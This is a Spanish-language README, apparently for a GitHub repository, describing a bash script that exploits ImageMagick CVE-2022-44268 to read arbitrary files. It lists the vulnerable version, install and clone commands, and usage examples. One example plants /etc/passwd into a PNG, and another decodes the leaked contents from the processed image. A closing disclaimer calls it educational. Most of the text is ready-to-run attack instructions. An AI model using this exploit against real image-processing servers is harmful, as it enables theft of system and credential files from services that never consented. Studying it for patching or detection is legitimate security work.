
Un script bash para explotar fácilmente la vulnerabilidad de lectura arbitraria de archivos de ImageMagick CVE-2022-44268
Un script bash para explotar fácilmente la vulnerabilidad de lectura arbitraria de archivos de ImageMagick CVE-2022-44268
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh
./script.sh -p [Ruta a leer] [Imagen PNG] [Salida[Opcional, si no se usa, el valor predeterminado es pngout.png]]
./script.sh -d [PNG]
Ejemplos
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png
Opciones
-h = Mostrar ayuda
-p = Añadir el exploit a una imagen PNG
-d = Extraer y decodificar el archivo leído
Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es responsabilidad exclusiva tuya. El mal uso del código en este repositorio puede dar lugar a cargos penales contra las personas en cuestión. El autor no será considerado responsable en caso de que se presenten cargos penales contra cualquier individuo que haga un mal uso del código en este repositorio para infringir la ley.